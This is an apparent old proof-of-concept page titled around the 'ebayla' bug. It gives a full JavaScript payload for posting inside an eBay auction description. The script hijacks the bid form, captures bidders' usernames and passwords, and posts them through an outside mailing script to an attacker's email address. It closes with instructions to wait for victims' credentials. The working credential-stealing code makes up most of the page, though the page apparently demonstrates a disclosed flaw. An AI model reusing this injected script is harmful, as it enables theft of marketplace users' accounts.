This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a malicious user can aquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl script, visit the the live demo at eBay.)

STEP 2:
Go to the sellers's area to post an item for auction. When asked to enter the description of the item, post the following description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords are to be sent.

1 car, comes with windows.  crashes frequently.  toy.<hr>

WARNING do not bid on this item!! This auction is a demonstration of the 
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.  
If you place/review a bid, your username and password will be mailed to 
http://www.because-we-can.com.


<script>
recipient = "blue_adept@because-we-can.com";

function printframeset(place_bid, mailUrl, username, password){
  document.open(); 
  document.writeln('<script>');
  document.writeln('function go(){');
  document.writeln('top.b.document.open();');
  document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
  document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
  document.writeln('top.b.document.writeln("</form>")');
  document.writeln('top.b.document.close();');
  document.writeln('}');
  document.writeln('</scr' + 'ipt>');
  document.writeln('</head>');
  document.writeln('<frameset rows="100%,*" onLoad="go()">');
  document.writeln('<frame name="t" src="' + place_bid + '">');
  document.writeln('<frame name="b" src="">');
  document.writeln('</frameset>');
  document.close();
}

function urlEncode(inStr)  {
  outStr=' ';  //not '' for a NS bug!
  for (i=0; i < inStr.length; i++)  {
    aChar=inStr.substring (i, i+1);
    switch(aChar){
      case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
      case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
      case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
      case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
      case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
      case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
      case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
      case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
      case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
      case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
      case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
      case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
      case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
      case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
      default: outStr += aChar;
    }
  }
  return outStr.substring(1, outStr.length);
}

function newaction(){
  window.document.forms[0].action="javascript:ebayla()";
}

function ebayla(){
  item = urlEncode(window.document.forms[0].item.value);
  username = urlEncode(window.document.forms[0].userid.value);
  password = urlEncode(window.document.forms[0].pass.value);
  maxbid = urlEncode(window.document.forms[0].maxbid.value);
  
  bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
  bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
  + "&pass=" + password + "&maxbid=" + maxbid;
  place_bid = bid_script + bid_query_string;

  mailscript = "http://204.225.88.132/cgi-bin/form1";
  mailUrl = mailscript + '?|' + recipient;
  printframeset(place_bid, mailUrl, username, password);
}

if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
  setTimeout("newaction()", 1000);
}

</script>

STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the user's username and password.

Note:
In the exploit described above, the part of the program that does the actual "dirty-work" of mailing the password and username is a randomly chosen server-side mailing script we found on the web. There are many equivalent and publicly available server-side mailing programs that can be used in it's place.